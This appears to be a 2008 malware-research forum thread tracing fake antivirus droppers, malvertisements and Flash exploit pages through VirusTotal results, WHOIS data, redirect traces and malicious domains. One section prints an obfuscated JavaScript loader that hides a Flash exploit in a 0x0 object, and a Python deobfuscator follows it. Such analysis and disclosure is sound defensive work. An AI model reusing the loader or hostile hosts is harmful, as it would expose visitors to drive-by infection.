SHA256: 1b34f636ab0dbb9cc585bfd9c2b672c36a2b53a66268221a73a370c0e86bec49
PEiD..: -
QUOTE
File lsd_k12.exe received on 09.20.2008 18:08:10 (CET)
AhnLab-V3 2008.9.19.2 2008.09.19 Win-Trojan/PEPatched.Gen
AntiVir 7.8.1.34 2008.09.19 TR/Spy.Frauder.dk
Authentium 5.1.0.4 2008.09.20 -
Avast 4.8.1195.0 2008.09.19 Win32:Frauder-B
AVG 8.0.0.161 2008.09.20 Downloader.FraudLoad.AC
BitDefender 7.2 2008.09.20 Trojan.FakeAlert.AEB
CAT-QuickHeal 9.50 2008.09.20 Win32.Backdoor.Frauder.dk.4
ClamAV 0.93.1 2008.09.20 -
DrWeb 4.44.0.09170 2008.09.20 Trojan.Packed.639
eSafe 7.0.17.0 2008.09.18 Suspicious File
eTrust-Vet 31.6.6096 2008.09.20 Win32/OnerawCryptorA!generic
Ewido 4.0 2008.09.20 -
F-Prot 4.4.4.56 2008.09.19 -
F-Secure 8.0.14332.0 2008.09.20 Backdoor.Win32.Frauder.dk
Fortinet 3.113.0.0 2008.09.20 -
GData 19 2008.09.20 Backdoor.Win32.Frauder.dk
Ikarus T3.1.1.34.0 2008.09.19 Backdoor.Win32.Frauder.dk
K7AntiVirus 7.10.466 2008.09.20 -
Kaspersky 7.0.0.125 2008.09.20 Backdoor.Win32.Frauder.dk
McAfee 5388 2008.09.19 Downloader-ASH.gen.b
Microsoft 1.3903 2008.09.20 TrojanDownloader:Win32/Renos.AS
NOD32v2 3457 2008.09.19 -
Norman 5.80.02 2008.09.19 W32/Tibs.gen234
Panda 9.0.0.4 2008.09.20 -
PCTools 4.4.2.0 2008.09.20 -
Prevx1 V2 2008.09.20 -
Rising 20.62.52.00 2008.09.20 Backdoor.Win32.Frauder.c
Sophos 4.33.0 2008.09.20 Mal/EncPk-EU
Sunbelt 3.1.1653.1 2008.09.20 -
Symantec 10 2008.09.20 Packed.Generic.186
TheHacker 6.3.0.9.089 2008.09.20 -
TrendMicro 8.700.0.1004 2008.09.20 -
VBA32 3.12.8.5 2008.09.20 -
ViRobot 2008.9.20.1385 2008.09.20 -
VirusBuster 4.5.11.0 2008.09.19 -
Webwasher-Gateway 6.6.2 2008.07.21 Heuristic.Crypted
______________________________

Visible Signs.

O4 - HKLM\..\Run: [lphcepaj0enej] C:\WINDOWS\system32\lphcepaj0enej.exe
O4 - HKLM\..\Run: [SMrhcapaj0enej] C:\Program Files\rhcapaj0enej\rhcapaj0enej.exe
______________________________

Desktop WallPaper.
IPB Image
Fake Antivirus Suite: Antivirus XP 2008.
IPB Image
______________________________

82.98.235.224

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-04-19
Expires: 2009-04-19
Updated: 2008-06-26
Name Server: NS1.DERGAMEND.COM (has 1 domains)
Name Server: NS2.DERGAMEND.COM

Server Type: Apache/2.2.8 (FreeBSD) mod_ssl/2.2.8 OpenSSL/0.9.8e DAV/2 PHP/5.2.5 with Suhosin-Patch
IP Location - Berlin - Berlin - Cyber Technology Bv Ba/sprl
Dedicated Hosting: dergamend.com is hosted on a dedicated server.

Whois Record
Registration Service Provided By: AXENICK, LTD.
Contact: +7.9516440742
Website: hxxp://www.axenick.com

Domain Name: DERGAMEND.COM

Registrant:
n/a
Petrov Dmitry Viktorovich ()
Stroitelei 26 46
Kirishi
Stavropolskiy kray,150020
RU
Tel. +007.9067794465

Creation Date: 19-Apr-2008
Expiration Date: 19-Apr-2009

Domain servers in listed order:
ns2.dergamend.com
ns1.dergamend.com

Administrative Contact:
n/a
Petrov Dmitry Viktorovich ()
Stroitelei 26 46
Kirishi
Stavropolskiy kray,150020
RU
Tel. +007.9067794465

Technical Contact:
n/a
Petrov Dmitry Viktorovich ()
Stroitelei 26 46
Kirishi
Stavropolskiy kray,150020
RU
Tel. +007.9067794465

Billing Contact:
n/a
Petrov Dmitry Viktorovich ()
Stroitelei 26 46
Kirishi
Stavropolskiy kray,150020
RU
Tel. +007.9067794465
______________________________

axp2008.com - 218.106.90.227
anti-virusxp2008.net - 77.244.220.134
Kimberly
<h4>
Alert : spaces.live.com - Winning Surveys ... Which Coffee is better
</h4>
Possible presence of the "Winning Surveys ... Which Coffee is better" malvertizement on spaces.live.com. On Sep 15 2008 this malicious banner was caught in situ on cnbc.com and at the same period it was served on spaces.live.com as seen on the screenshot in the article about the Presidential Election (spam) Campaign published by Websense.
IPB Image
Windows Live Spaces is using advertisements from spe.atdmt.com, so chances are fairly high that we are talking about the same malvertizement, e.g. spe.atdmt.com/ds/MSMSNMATCVNI/728x90_logo.swf
Note the MSMSN part in the folder name ... extreme caution when visiting MSNBC, MSN, Hotmail, etc. is advised.
Kimberly
<h4>
ver.swf & flashVersion + "ff.swf" - www.1ive.net
</h4>
A very small SWF file first tests your Flash version and will load the corresponding Flash file using LoadMovie().
IPB Image
Filename: ver.swf

File size: 172 bytes
MD5...: 15bffaeeee49c3dd6e436892861802e6
SHA1..: 2c9291a80c0a47a112216ce666b611b3e6e16df4
SHA256: b94c7105b52a8fb672cabda896867baee308d974bbce8dbbb81f912ef2eb66da
PEiD..: -
packers (Kaspersky): Swf2Swc
QUOTE
File ver.swf received on 10.01.2008 15:39:20 (CET)
AhnLab-V3 2008.10.1.0 2008.10.01 -
AntiVir 7.8.1.34 2008.10.01 EXP/Flash.KLI.172
Authentium 5.1.0.4 2008.09.30 -
Avast 4.8.1248.0 2008.10.01 SWF:Downloader
AVG 8.0.0.161 2008.10.01 -
BitDefender 7.2 2008.10.01 -
CAT-QuickHeal 9.50 2008.10.01 -
ClamAV 0.93.1 2008.10.01 -
DrWeb 4.44.0.09170 2008.10.01 -
eSafe 7.0.17.0 2008.10.01 -
eTrust-Vet 31.6.6119 2008.09.30 -
Ewido 4.0 2008.10.01 -
F-Prot 4.4.4.56 2008.09.30 -
F-Secure 8.0.14332.0 2008.10.01 -
Fortinet 3.113.0.0 2008.10.01 -
GData 19 2008.10.01 SWF:Downloader
Ikarus T3.1.1.34.0 2008.10.01 Virus.SWF.Downloader
K7AntiVirus 7.10.479 2008.10.01 -
Kaspersky 7.0.0.125 2008.10.01 -
McAfee 5395 2008.10.01 Generic Downloader.bk
Microsoft 1.4005 2008.10.01 -
NOD32 3485 2008.10.01 SWF/Exploit.CVE-2007-0071
Norman 5.80.02 2008.09.30 -
Panda 9.0.0.4 2008.09.30 -
PCTools 4.4.2.0 2008.10.01 -
Prevx1 V2 2008.10.01 -
Rising 20.63.62.00 2008.09.28 -
SecureWeb-Gateway 6.7.6 2008.10.01 Exploit.Flash.KLI.172
Sophos 4.34.0 2008.10.01 Troj/SWFdlr-Gen
Sunbelt 3.1.1668.1 2008.09.24 -
Symantec 10 2008.10.01 -
TheHacker 6.3.0.9.097 2008.10.01 -
TrendMicro 8.700.0.1004 2008.10.01 -
VBA32 3.12.8.6 2008.09.30 -
ViRobot 2008.10.1.1401 2008.10.01 -
VirusBuster 4.5.11.0 2008.09.30 -
______________________________

Filename: flashVersion + "ff.swf" (WIN_9_0_47_0ff.swf)

File size: 2487 bytes
MD5...: 919f16444f0cf7b47d501c19c27f72a0
SHA1..: ed762c53801846c7943c6e6aba9dac283f3601e2
SHA256: 62683a7b5eb37473c0fdbe3ae5bf459389b0296ab2d18b86b66e91ac43b65c26
PEiD..: -
packers (Kaspersky): Swf2Swc
QUOTE
File WIN_9_0_47_0ff.swf received on 10.01.2008 15:40:36 (CET)
AhnLab-V3 2008.10.1.0 2008.10.01 -
AntiVir 7.8.1.34 2008.10.01 EXP/Flash.Gen
Authentium 5.1.0.4 2008.09.30 -
Avast 4.8.1248.0 2008.10.01 SWF:CVE-2007-0071
BitDefender 7.2 2008.10.01 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.10.01 SWF.Exploit
ClamAV 0.93.1 2008.10.01 -
DrWeb 4.44.0.09170 2008.10.01 -
eSafe 7.0.17.0 2008.10.01 -
eTrust-Vet 31.6.6120 2008.10.01 -
Ewido 4.0 2008.10.01 -
F-Prot 4.4.4.56 2008.09.30 -
F-Secure 8.0.14332.0 2008.10.01 -
Fortinet 3.113.0.0 2008.10.01 -
GData 19 2008.10.01 Exploit.SWF.Gen
Ikarus T3.1.1.34.0 2008.10.01 -
K7AntiVirus 7.10.479 2008.10.01 -
Kaspersky 7.0.0.125 2008.10.01 -
McAfee 5395 2008.10.01 -
Microsoft 1.4005 2008.10.01 Exploit:Win32/APSB08-11.gen!A
NOD32 3485 2008.10.01 SWF/Exploit.CVE-2007-0071
Norman 5.80.02 2008.09.30 -
Panda 9.0.0.4 2008.09.30 -
PCTools 4.4.2.0 2008.10.01 -
Prevx1 V2 2008.10.01 -
Rising 20.63.62.00 2008.09.28 -
SecureWeb-Gateway 6.7.6 2008.10.01 Exploit.Flash.Gen
Sophos 4.34.0 2008.10.01 Exp/SWFScene-A
Sunbelt 3.1.1675.1 2008.09.27 -
Symantec 10 2008.10.01 Bloodhound.Exploit.193
TheHacker 6.3.0.9.097 2008.10.01 -
TrendMicro 8.700.0.1004 2008.10.01 -
VBA32 3.12.8.6 2008.09.30 -
ViRobot 2008.10.1.1401 2008.10.01 -
VirusBuster 4.5.11.0 2008.09.30 -
______________________________

www.1ive.net

IP Address: 125.46.57.157
IP Location - Beijing - Beijing - Cncgroup Henan Province Network
Server Type: Microsoft-IIS/6.0
ICANN Registrar: XIN NET TECHNOLOGY CORPORATION
Created: 2007-11-20
Expires: 2008-11-20
Updated: 2007-11-20
Name Server: NS1.72DNS.COM (has 8,602 domains)
Name Server: NS2.72DNS.COM
Whois Server: whois.paycenter.com.cn

<h4>
i47.swf - rondll32.exe
</h4>
The webpage first checks if the victim is using Internet Explorer or another browser. If the User Agent is MSIE then i1.html will be loaded, otherwise f2.html is loaded.
IPB Image
Flash version is tested and the appropriate Flash file is loaded. Below is the code from i1.html.
IPB Image
The payload consists of an executable called rondll32.exe.
IPB Image
Filename: i47.swf

File size: 1411 bytes
MD5...: da119e1d0d8c4eb043f64e3eaa9976e4
SHA1..: f7d42b0ea81979dc11b20dd1cce4da4c4ca2548f
SHA256: 180196642853ae304df84ab991f6e9c5c043b1a6d0bd06de7ad2f3e592a7f8b5
PEiD..: -
packers (Kaspersky): Swf2Swc
QUOTE
File i47.swf received on 10.01.2008 16:48:39 (CET)
AhnLab-V3 2008.10.2.0 2008.10.01 -
AntiVir 7.8.1.34 2008.10.01 EXP/Flash.Gen
Authentium 5.1.0.4 2008.09.30 -
Avast 4.8.1248.0 2008.10.01 SWF:CVE-2007-0071
AVG 8.0.0.161 2008.10.01 -
BitDefender 7.2 2008.10.01 -
CAT-QuickHeal 9.50 2008.10.01 SWF.Exploit
ClamAV 0.93.1 2008.10.01 -
DrWeb 4.44.0.09170 2008.10.01 -
eSafe 7.0.17.0 2008.10.01 -
eTrust-Vet 31.6.6119 2008.09.30 -
Ewido 4.0 2008.10.01 -
F-Prot 4.4.4.56 2008.09.30 -
F-Secure 8.0.14332.0 2008.10.01 Exploit.SWF.Downloader.je
Fortinet 3.113.0.0 2008.10.01 -
GData 19 2008.10.01 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.10.01 Virus.Exploit.SWF.Downloader.je
K7AntiVirus 7.10.479 2008.10.01 -
Kaspersky 7.0.0.125 2008.10.01 Exploit.SWF.Downloader.je
McAfee 5395 2008.10.01 Exploit-CVE2007-0071
Microsoft 1.4005 2008.10.01 Exploit:Win32/APSB08-11.gen!A
NOD32 3486 2008.10.01 SWF/Exploit.CVE-2007-0071
Norman 5.80.02 2008.09.30 -
Panda 9.0.0.4 2008.09.30 -
PCTools 4.4.2.0 2008.10.01 -
Prevx1 V2 2008.10.01 -
Rising 20.63.62.00 2008.09.28 -
SecureWeb-Gateway 6.7.6 2008.10.01 Exploit.Flash.Gen
Sophos 4.34.0 2008.10.01 Troj/SWFExp-I
Sunbelt 3.1.1675.1 2008.09.27 -
Symantec 10 2008.10.01 Downloader.Swif.C
TheHacker 6.3.0.9.097 2008.10.01 -
TrendMicro 8.700.0.1004 2008.10.01 -
VBA32 3.12.8.6 2008.09.30 -
ViRobot 2008.10.1.1401 2008.10.01 -
VirusBuster 4.5.11.0 2008.10.01 -
______________________________

Payload: rondll32.exe

Virustotal Result: 28/36 (77.78%)
Kaspersky: Trojan.Win32.Agent.affi
______________________________

www.ppexe.com

IP Address: 121.11.76.85
IP Location - Guangdong - Guangzhou - Chinanet Guangdong Province Network
Server Type: Microsoft-IIS/6.0
ICANN Registrar: 35 TECHNOLOGY CO., LTD
Created: 2008-08-16
Expires: 2009-08-16
Updated: 2008-08-16
Name Server: NS3.DNS-DIY.COM (has 237,181 domains)
Name Server: NS4.DNS-DIY.COM
Whois Server: whois.35.com

Websites.
  1. jjmaobuduo.3322.org
  2. jjmaoduo2.3322.org
  3. plgou.com
  4. ppexe.com
  5. www.plgou.com
  6. www3.ss11qn.cn
  7. xxkk.net
Kimberly
<h4>
www.oinko.net
</h4>
I did mention hacked .htaccess files for the first time here. I ran into one myself yesterday. If you visit the website, nothing happens. If you come from a search engine, you are redirected to a fake online scanner.
IPB Image
Network Trace.
CODE
GET /freeasp/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.com/search?hl=en&q=Free+ASP+[removed]&btnG=Google+Search&aq=f&oq=
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.oinko.net
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Fri, 03 Oct 2008 15:49:19 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Server: Apache
Location: http://87.248.180.90/in.html?s=ipw2

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://87.248.180.90/in.html?s=ipw2">here</A>.<P>
</BODY></HTML>
Illustration.
  • Using Google as a referrer.

    IPB Image

  • No referrer.

    IPB Image
Redirects.
87.248.180.90/in.html?s=ipw2
adaptivetds.name/soft.php?aid=0147&d=1&product=XPA&refer=bb1f0c2b3
computerantiviruspro.com/2009/1/freescan.php?id=880147
<h4>
IP details
</h4>
adaptivetds.name - 216.240.134.211

Website Title: None given.
ICANN Registrar: Directi Internet Solutions Pvt. Ltd. d/b/a PublicDomainRegistry.com
Created: 2008-09-16
Expires: 2009-09-16
Updated: 2008-09-16
Name Server: NS1.STARTED.RU (has 415 domains)
Name Server: NS2.STARTED.RU
Whois Server: whois.publicdomainregistry.com

IP Location - California - Irvine - Go2online Corp
______________________________

computerantiviruspro.com - 84.16.252.138

Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-09-09
Expires: 2009-09-09
Updated: 2008-09-26
Name Server: NS1.FREEFASTDNS.COM (has 38 domains)
Name Server: NS2.FREEFASTDNS.COM
Whois Server: whois.estdomains.com

IP Location - Berlin - Berlin - Netdirekt E.k

Whois Record
Registration Service Provider: LovingDomains.com - E-Gold Domain Registration
Website: www.lovingdomains.com
Accept Pecunix, e-Bullion, E-Gold, PayPal, MoneyBookers, WebMoney, Epassporte, Liberty
Reserve, Fethard Finance and Capital Collect

Domain Name: COMPUTERANTIVIRUSPRO.COM

Registrant:
N/A
Maureen Whelan ()
25 Industrial Park Road
Middletown
Connecticut,06457
US
Tel. +860.8072110

domains sharing nameservers
  1. bestantivirusscan.com
  2. freefastdns.com
  3. megatradetds0.com
  4. onlineprivatescan.com
  5. securedownloadcenter.com
  6. winupdates-server.com
Note: onlineprivatescan.com has been mentioned recently on 2 boards being the cause of redirects. Network traces would be highly appreciated if you experience those redirects to fake online scanners. A malicious advertisement may be at the origin of it.
______________________________

onlineprivatescan.com - 216.240.134.208

Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-09-10
Expires: 2009-09-10
Updated: 2008-09-26
Registrar Status: clientTransferProhibited
Name Server: NS1.FREEFASTDNS.COM (has 38 domains)
Name Server: NS2.FREEFASTDNS.COM
Whois Server: whois.estdomains.com

IP Address: 216.240.134.208
IP Location - California - Irvine - Go2online Corp

Whois Record
Registration Service Provider: LovingDomains.com - E-Gold Domain Registration
Website: www.lovingdomains.com
Accept Pecunix, e-Bullion, E-Gold, PayPal, MoneyBookers, WebMoney, Epassporte, Liberty
Reserve, Fethard Finance and Capital Collect

Domain Name: ONLINEPRIVATESCAN.COM

Registrant:
N/A
Annette Young-Ogata ()
475 22nd Avenue
Honolulu
Hawaii,96813
US
Tel. +808.5863124

hostnames sharing ip with a-records
  1. bestantivirusscan.com
  2. googlescanners-360.com
  3. protectedtds.name
  4. seamastersoft.com
  5. trustedpaymenssite.com
domains sharing nameservers
  1. bestantivirusscan.com
  2. computerantiviruspro.com
  3. freefastdns.com
  4. megatradetds0.com
  5. securedownloadcenter.com
  6. winupdates-server.com
Kimberly
<h4>
www.movizdb.com - Skype
</h4>
The Skype malvertizement is being served on www.movizdb.com, not in the "usual way" but through ClickInText which is similar to IntelliTXT and Kontera. They also use those small ads that slide onto the screen from the left side and that's how the Skype banner was displayed. The advertising company weborama.fr who does host the Skype Flash banner is rather big, so this malvertizement might be seen on several other French websites.

Screenshot in situ.
IPB Image
Banner.
lstatic.weborama.fr/ads/4/20081003/487/153640_weborama300x250.swf
IPB Image IPB Image
IPB Image IPB Image
At the time of the writeup, AdopsTools does NOT detect the malicious code inside the banner.

Campaign.
s-tatetstr.com/crossdomain.xml
s-tatetstr.com/c/index.php?id=[removed]
profitabill.com/?cmpid=chutzpahme
adverdaemon.com/?cmp=[removed]
performanceoptimizer.com/.landing?cmp=[removed]
IPB Image
IPB Image
stats.sellmosoft.net/pos_id_performanceoptimizer/poa_mfcchutzpahme_[removed]/stats.php
<h4>
s-tatetstr.com
</h4>
We see a new domain here, s-tatetstr.com. Regular readers will recognize the website title UniqAds ...

s-tatetstr.com - 92.62.100.27

Website Title: UniqAds
ICANN Registrar: TLDS, LLC DBA SRSPLUS
Created: 2008-09-25
Expires: 2009-09-25
Updated: 2008-09-25
Name Server: NS1.S-TATETSTR.COM (has 1 domains)
Name Server: NS2.S-TATETSTR.COM
Whois Server: whois.srsplus.com

IP Location - Estonia - Starline Web Services
Dedicated Hosting: s-tatetstr.com is hosted on a dedicated server.

Registrant:
Sagent Group ()
Sagent Group Ltd.
Guzel street, 45
Belize City, NONE NONE
BZ
698-456-324

Administrative, Technical, Billing Contact:
Sagent Group ()
Sagent Group Ltd.
Guzel street, 45
Belize City, NONE NONE
BZ
698-456-324

Domain Service Provider:
Sagent Group
Kimberly
<h4>
ifff.swf & ly20088.asp?gameee= + flashVersion & x.exe / orz.exe
</h4>
On the website containing the exploit, a script tests if the User-Agent is Internet Explorer or not. According to the result, ifff.swf or ffff.swf will be loaded.
CODE
<script>
document.writeln("<script>function init(){window.status=\"\";}window.onload = init;");
document.writeln("window.onerror=function(){return true;}");
document.writeln("");
document.writeln("if(navigator.userAgent.toLowerCase().indexOf(\"msie\")>0)");
document.writeln("{");
document.writeln("document.write(\'<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=4,0,19,0\" width=\"0\" height=\"0\" align=\"middle\">\');");
document.writeln("document.write(\'<param name=\"allowScriptAccess\" value=\"sameDomain\"\/>\');");
document.writeln("document.write(\'<param name=\"movie\" value=\"ifff.swf\"\/>\');");
document.writeln("document.write(\'<param name=\"quality\" value=\"high\"\/>\');");
document.writeln("document.write(\'<param name=\"bgcolor\" value=\"#ffffff\"\/>\');");
document.writeln("document.write(\'<embed src=\"ifff.swf\"\/>\');");
document.writeln("document.write(\'<\/object>\');");
document.writeln("}");
document.writeln("else{document.write(\'<EMBED src=\"ffff.swf\" width=0 height=0>\');}");
document.writeln("<\/script>")
</script>
ifff.swf contains an actionscript to load another small swf file based on the Flash version detected.
IPB Image
ly20088.asp?gameee=WIN_9_0_47_0 contains malicious code triggering the download & execution of x.exe - saved as orz.exe on the computer.
IPB Image

<h4>
Virustotal Results
</h4>
Filename: ifff.swf

Additional information
File size: 122 bytes
MD5...: 633d962b78a661a26467cf7533ed3803
SHA1..: c82e40f5c8fee27afb9bb4f84d3306bd39a57fa3
SHA256: c879317d0b7fef81e373993af7208d5a9e1c2306058bbf3420846cd2d05d82ff
QUOTE
File ifff.swf received on 10.09.2008 18:58:23 (CET)
AhnLab-V3 2008.10.10.0 2008.10.09 -
AntiVir 7.8.1.34 2008.10.09 -
Authentium 5.1.0.4 2008.10.09 -
Avast 4.8.1248.0 2008.10.09 -
AVG 8.0.0.161 2008.10.09 -
BitDefender 7.2 2008.10.09 -
CAT-QuickHeal 9.50 2008.10.08 -
ClamAV 0.93.1 2008.10.09 -
DrWeb 4.44.0.09170 2008.10.09 -
eSafe 7.0.17.0 2008.10.08 -
eTrust-Vet 31.6.6137 2008.10.09 -
Ewido 4.0 2008.10.09 -
F-Prot 4.4.4.56 2008.10.08 -
F-Secure 8.0.14332.0 2008.10.09 -
Fortinet 3.113.0.0 2008.10.09 -
GData 19 2008.10.09 -
Ikarus T3.1.1.34.0 2008.10.09 -
K7AntiVirus 7.10.489 2008.10.09 -
Kaspersky 7.0.0.125 2008.10.09 -
McAfee 5401 2008.10.09 -
Microsoft 1.4005 2008.10.09 -
NOD32 3507 2008.10.09 -
Norman 5.80.02 2008.10.09 -
Panda 9.0.0.4 2008.10.09 -
PCTools 4.4.2.0 2008.10.09 -
Prevx1 V2 2008.10.09 -
Rising 20.65.32.00 2008.10.09 -
SecureWeb-Gateway 6.7.6 2008.10.09 -
Sophos 4.34.0 2008.10.09 -
Sunbelt 3.1.1708.1 2008.10.09 -
Symantec 10 2008.10.09 -
TheHacker 6.3.1.0.103 2008.10.07 -
TrendMicro 8.700.0.1004 2008.10.09 -
VBA32 3.12.8.6 2008.10.09 -
ViRobot 2008.10.9.1414 2008.10.09 -
VirusBuster 4.5.11.0 2008.10.09 -
______________________________

Filename: ly20088.asp_gameee_WIN_9_0_47_0.swf

Additional information
File size: 2581 bytes
MD5...: f04f725a581f75337c1be515dca6d70f
SHA1..: 12ffb37e77b15e666da5beaf085593db3e862773
SHA256: 41af249cfc8b58fa4ee55b5f52daee5d16d950ffd03dcc1f788d53368b00fc30
packers (Kaspersky): Swf2Swc
QUOTE
File ly20088.asp_gameee_WIN_9_0_47_0.s received on 10.09.2008 18:59:46 (CET)
AhnLab-V3 2008.10.10.0 2008.10.09 -
AntiVir 7.8.1.34 2008.10.09 EXP/Flash.Gen
Authentium 5.1.0.4 2008.10.09 -
Avast 4.8.1248.0 2008.10.09 SWF:CVE-2007-0071
AVG 8.0.0.161 2008.10.09 -
BitDefender 7.2 2008.10.09 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.10.08 SWF.Exploit
ClamAV 0.93.1 2008.10.09 -
DrWeb 4.44.0.09170 2008.10.09 -
eSafe 7.0.17.0 2008.10.08 -
eTrust-Vet 31.6.6137 2008.10.09 -
Ewido 4.0 2008.10.09 -
F-Prot 4.4.4.56 2008.10.08 -
F-Secure 8.0.14332.0 2008.10.09 -
Fortinet 3.113.0.0 2008.10.09 -
GData 19 2008.10.09 Exploit.SWF.Gen
Ikarus T3.1.1.34.0 2008.10.09 -
K7AntiVirus 7.10.489 2008.10.09 -
Kaspersky 7.0.0.125 2008.10.09 -
McAfee 5401 2008.10.09 -
Microsoft 1.4005 2008.10.09 Exploit:Win32/APSB08-11.gen!A
NOD32 3507 2008.10.09 -
Norman 5.80.02 2008.10.09 -
Panda 9.0.0.4 2008.10.09 -
PCTools 4.4.2.0 2008.10.09 -
Prevx1 V2 2008.10.09 -
Rising 20.65.32.00 2008.10.09 -
SecureWeb-Gateway 6.7.6 2008.10.09 Exploit.Flash.Gen
Sophos 4.34.0 2008.10.09 -
Sunbelt 3.1.1708.1 2008.10.09 -
Symantec 10 2008.10.09 -
TheHacker 6.3.1.0.103 2008.10.07 -
TrendMicro 8.700.0.1004 2008.10.09 -
VBA32 3.12.8.6 2008.10.09 -
ViRobot 2008.10.9.1414 2008.10.09 -
VirusBuster 4.5.11.0 2008.10.09 -
______________________________

Filename: x.exe / orz.exe

Additional information
MD5: 239ce0f68006f106972709553eef5c1f
SHA1: a5867f436be362472b6057af6c9d51724f168239
SHA256: fa259032c36a152e6bf240c12bc2bace89d4df5ef441955612b9c23883f5e7cf
QUOTE
File x.exe received on 10.08.2008 02:13:29 (CET)
AhnLab-V3 - - -
AntiVir - - TR/PSW.O.juki.33056
Authentium - - W32/Heuristic-KPP!Eldorado
Avast - - Win32:Trojan-gen {Other}
AVG - - -
BitDefender - - -
CAT-QuickHeal - - -
ClamAV - - -
DrWeb - - DLOADER.Trojan
eSafe - - -
eTrust-Vet - - -
Ewido - - Heuristic.Win32.AVKiller
F-Prot - - W32/Heuristic-KPP!Eldorado
F-Secure - - -
Fortinet - - -
GData - - Win32:Trojan-gen {Other}
Ikarus - - -
K7AntiVirus - - -
Kaspersky - - Trojan-GameThief.Win32.WOW.cds
McAfee - - -
Microsoft - - -
NOD32 - - Win32/PSW.WOW.NET
Norman - - -
Panda - - Suspicious file
PCTools - - -
Prevx1 - - -
Rising - - -
SecureWeb-Gateway - - Trojan.PSW.O.juki.33056
Sophos - - Troj/WoW-KD
Sunbelt - - -
Symantec - - -
TheHacker - - -
TrendMicro - - Mal_OLGM-6
VBA32 - - -
ViRobot - - -
VirusBuster - - -
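The i47.swf and ifff.swf pages above use the same trick: a script made only of document.writeln() calls that, once run, emits a second script which tests the User-Agent and writes a 0x0 Flash object. The following Python script is an added example (it is not code from the post or from the exploit kit) that peels those two layers statically, without executing any JavaScript, so a researcher can see which .swf files a loader references and whether it hides the player. The sample input is the loader quoted in this post; the function and dictionary key names are my own.

```python
import re

# Sample input: the loader quoted in the post above, embedded so this runs offline.
SAMPLE_LOADER = r'''<script>
document.writeln("<script>function init(){window.status=\"\";}window.onload = init;");
document.writeln("window.onerror=function(){return true;}");
document.writeln("");
document.writeln("if(navigator.userAgent.toLowerCase().indexOf(\"msie\")>0)");
document.writeln("{");
document.writeln("document.write(\'<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=4,0,19,0\" width=\"0\" height=\"0\" align=\"middle\">\');");
document.writeln("document.write(\'<param name=\"allowScriptAccess\" value=\"sameDomain\"\/>\');");
document.writeln("document.write(\'<param name=\"movie\" value=\"ifff.swf\"\/>\');");
document.writeln("document.write(\'<param name=\"quality\" value=\"high\"\/>\');");
document.writeln("document.write(\'<param name=\"bgcolor\" value=\"#ffffff\"\/>\');");
document.writeln("document.write(\'<embed src=\"ifff.swf\"\/>\');");
document.writeln("document.write(\'<\/object>\');");
document.writeln("}");
document.writeln("else{document.write(\'<EMBED src=\"ffff.swf\" width=0 height=0>\');}");
document.writeln("<\/script>")
</script>'''

# A double-quoted JS string literal, allowing escaped characters inside it.
WRITELN_RE = re.compile(r'document\.writeln\("((?:[^"\\]|\\.)*)"\)')
# A single-quoted JS string literal passed to document.write().
WRITE_RE = re.compile(r"document\.write\('((?:[^'\\]|\\.)*)'\)")


def js_unescape(s):
    """Undo the JS string escapes the wrapper relies on: \\" \\' \\/ \\\\ \\n \\t."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def peel_writeln(script):
    """Layer 1: join the document.writeln() arguments into the script they emit."""
    return "\n".join(js_unescape(m.group(1)) for m in WRITELN_RE.finditer(script))


def peel_write(script):
    """Layer 2: collect the HTML that the emitted script writes into the page."""
    return "\n".join(js_unescape(m.group(1)) for m in WRITE_RE.finditer(script))


def analyze_loader(script):
    """Summarise what a writeln-wrapped loader would put into the page."""
    inner = peel_writeln(script)
    html = peel_write(inner)
    classid = re.search(r'classid="([^"]+)"', html, re.I)
    return {
        # browser branching on the User-Agent, as described in the post
        "ua_branch": bool(re.search(r'navigator\.userAgent.*?indexOf\("msie"\)', inner)),
        # every .swf referenced by src= or value= in either branch
        "flash_files": sorted(set(re.findall(r'(?:src|value)="?([^"\s>]+\.swf)', html, re.I))),
        # a 0x0 player is a strong hint that the Flash content is not meant to be seen
        "hidden": bool(re.search(r'width="?0"?\s+height="?0"?', html, re.I)),
        "activex_classid": classid.group(1) if classid else None,
    }


if __name__ == "__main__":
    for key, value in analyze_loader(SAMPLE_LOADER).items():
        print(f"{key}: {value}")
```

Because the script never evaluates the JavaScript, both branches of the User-Agent test are reported at once, which is what you want when triaging a capture: the MSIE branch (ifff.swf via the ActiveX classid) and the non-MSIE branch (ffff.swf via a plain EMBED) both show up in `flash_files`.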
Kimberly
<h4>
Important Alert: adnewgeneration.com
</h4>
adnewgeneration.com is involved in redirects at careerbuilder.com this week. At the time of the writeup I'm unable to reproduce it unfortunately.

Known elements ...

The following code does trigger the redirect. I left out geo-location for privacy reasons.
CODE
GET /?campaign=2235499&size=300x250&clickurl=http://discoverireland.com&linktarget=_blank HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adnewgeneration.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Transfer-Encoding: chunked
X-Powered-By: PHP/5.2.6-5
